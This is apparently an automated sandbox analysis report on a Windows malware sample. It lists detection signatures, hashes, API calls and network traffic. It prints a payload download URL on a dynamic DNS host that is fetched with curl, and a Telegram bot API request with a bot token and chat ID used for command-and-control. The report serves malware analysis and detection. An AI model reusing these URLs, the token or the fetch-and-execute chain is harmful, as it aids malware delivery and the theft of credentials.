Windows Analysis Report
SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe
Analysis ID: 1416945
MD5: e31217888b467821745770b0f9565f66
SHA1: a6b7f7f96f02c2e78f6d35570948f29ee89665d9
SHA256: 664cf9b9a6c02eb803043cae1e2097d9fd1fa5c7fed6def439a969d6d5ea260b
Tags: exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Potential malicious VBS script found (suspicious strings)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection

Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll: Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel Avira URL Cloud: Label: malware
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Avira URL Cloud: Label: malware
Source: puredgb.duckdns.org Virustotal: Detection: 8%
Source: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe Virustotal: Detection: 7%
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3294244 CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx,wcslen, 0_2_00007FF7B3294244
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327E6A4 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 0_2_00007FF7B327E6A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F970 memset,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 0_2_00007FF7B327F970
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F0EC memset,_strdup,fopen,free,fseek,ftell,fread,fclose,free,fseek,malloc,strlen,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free, 0_2_00007FF7B327F0EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E70 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 0_2_00007FF7B3299E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E60 CryptHashData, 0_2_00007FF7B3299E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3293D58 strlen,strlen,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 0_2_00007FF7B3293D58
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3299E14 CryptAcquireContextA,CryptCreateHash, 0_2_00007FF7B3299E14
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: -----BEGIN PUBLIC KEY----- 0_2_00007FF7B326CD8C
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: tmp.vbs, 00000004.00000000.1510729864.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512748177.00000263F2900000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs, 00000004.00000002.1533810636.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512346232.00000263F2009000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, 0_2_00007FF7B329A438
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 0_2_00007FF7B329A4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0AC40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, 4_2_00007FF7B0AEF900

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\curl.exe

Networking

Source: unknown DNS query: name: puredgb.duckdns.org
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49707
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.9:49707 -> 200.165.100.3:30000
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View ASN Name: TelemarNorteLesteSABR TelemarNorteLesteSABR
Source: Joe Sandbox View JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327A5D8 recv,WSAGetLastError, 0_2_00007FF7B327A5D8
Source: global traffic HTTP traffic detected: GET /bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success HTTP/1.1Host: api.telegram.orgUser-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /xmg8oxqt/ping.exe HTTP/1.1Host: puredgb.duckdns.org:30000User-Agent: curl/7.79.1Accept: */*
Source: unknown DNS traffic detected: queries for: puredgb.duckdns.org
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: http://decimate.online
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: http://decimate.onlinehey
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe.dlll:
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exel
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exew
Source: curl.exe, 00000008.00000002.1533438725.000001FB15808000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr, ping.bat.4.dr String found in binary or memory: https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=69151
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/hsts.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: https://ibb.co/pjHVbzL).
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49710 version: TLS 1.2

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABC308: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ABC308
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32328A8 0_2_00007FF7B32328A8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3276BEC 0_2_00007FF7B3276BEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3235AE8 0_2_00007FF7B3235AE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327796C 0_2_00007FF7B327796C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3245F20 0_2_00007FF7B3245F20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3249EAC 0_2_00007FF7B3249EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329043C 0_2_00007FF7B329043C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3241494 0_2_00007FF7B3241494
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC 0_2_00007FF7B329A4AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3260358 0_2_00007FF7B3260358
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32403A4 0_2_00007FF7B32403A4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32643D8 0_2_00007FF7B32643D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3280280 0_2_00007FF7B3280280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32632E0 0_2_00007FF7B32632E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B326D174 0_2_00007FF7B326D174
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3272890 0_2_00007FF7B3272890
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3293878 0_2_00007FF7B3293878
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B328C85C 0_2_00007FF7B328C85C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32888CC 0_2_00007FF7B32888CC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32538BC 0_2_00007FF7B32538BC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B322A8F8 0_2_00007FF7B322A8F8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327D644 0_2_00007FF7B327D644
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B323F694 0_2_00007FF7B323F694
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B325366C 0_2_00007FF7B325366C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3264658 0_2_00007FF7B3264658
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263698 0_2_00007FF7B3263698
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3237594 0_2_00007FF7B3237594
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3265C48 0_2_00007FF7B3265C48
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329BC4A 0_2_00007FF7B329BC4A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3280C80 0_2_00007FF7B3280C80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3279D0C 0_2_00007FF7B3279D0C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324AB5C 0_2_00007FF7B324AB5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3298BB8 0_2_00007FF7B3298BB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3251BC4 0_2_00007FF7B3251BC4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263BB0 0_2_00007FF7B3263BB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324CB9C 0_2_00007FF7B324CB9C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B328EA70 0_2_00007FF7B328EA70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3223AD0 0_2_00007FF7B3223AD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B322BAD8 0_2_00007FF7B322BAD8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B32850C4 0_2_00007FF7B32850C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327F0EC 0_2_00007FF7B327F0EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B326EF34 0_2_00007FF7B326EF34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263F96 0_2_00007FF7B3263F96
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3266F74 0_2_00007FF7B3266F74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3232E60 0_2_00007FF7B3232E60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3260EAC 0_2_00007FF7B3260EAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3255EF0 0_2_00007FF7B3255EF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B324BD24 0_2_00007FF7B324BD24
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3281D78 0_2_00007FF7B3281D78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3263D80 0_2_00007FF7B3263D80
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3253E00 0_2_00007FF7B3253E00
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACA1CC 4_2_00007FF7B0ACA1CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE03B4 4_2_00007FF7B0AE03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABF8F0 4_2_00007FF7B0ABF8F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADCAE8 4_2_00007FF7B0ADCAE8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB5E30 4_2_00007FF7B0AB5E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC11D4 4_2_00007FF7B0AC11D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF21B0 4_2_00007FF7B0AF21B0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABC308 4_2_00007FF7B0ABC308
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABA304 4_2_00007FF7B0ABA304
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACB250 4_2_00007FF7B0ACB250
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB7288 4_2_00007FF7B0AB7288
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEC498 4_2_00007FF7B0AEC498
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD35C4 4_2_00007FF7B0AD35C4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE8600 4_2_00007FF7B0AE8600
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB76C0 4_2_00007FF7B0AB76C0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD2710 4_2_00007FF7B0AD2710
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF6F4 4_2_00007FF7B0AEF6F4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACC688 4_2_00007FF7B0ACC688
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABA66C 4_2_00007FF7B0ABA66C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD47F8 4_2_00007FF7B0AD47F8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF5758 4_2_00007FF7B0AF5758
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC58D4 4_2_00007FF7B0AC58D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACB8AC 4_2_00007FF7B0ACB8AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB4840 4_2_00007FF7B0AB4840
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE887C 4_2_00007FF7B0AE887C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD29B8 4_2_00007FF7B0AD29B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB1AA4 4_2_00007FF7B0AB1AA4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD8A54 4_2_00007FF7B0AD8A54
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE03B4 4_2_00007FF7B0AE03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC1A5C 4_2_00007FF7B0AC1A5C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD1B80 4_2_00007FF7B0AD1B80
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF1CE0 4_2_00007FF7B0AF1CE0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACAC34 4_2_00007FF7B0ACAC34
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD1E30 4_2_00007FF7B0AD1E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACEE74 4_2_00007FF7B0ACEE74
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD30E4 4_2_00007FF7B0AD30E4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD5050 4_2_00007FF7B0AD5050
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327CDC8 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327A384 appears 169 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B329BA1E appears 52 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B322DFF4 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327A450 appears 166 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327CE1C appears 83 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B329B9FA appears 41 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140_1.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: rasadhlp.dll
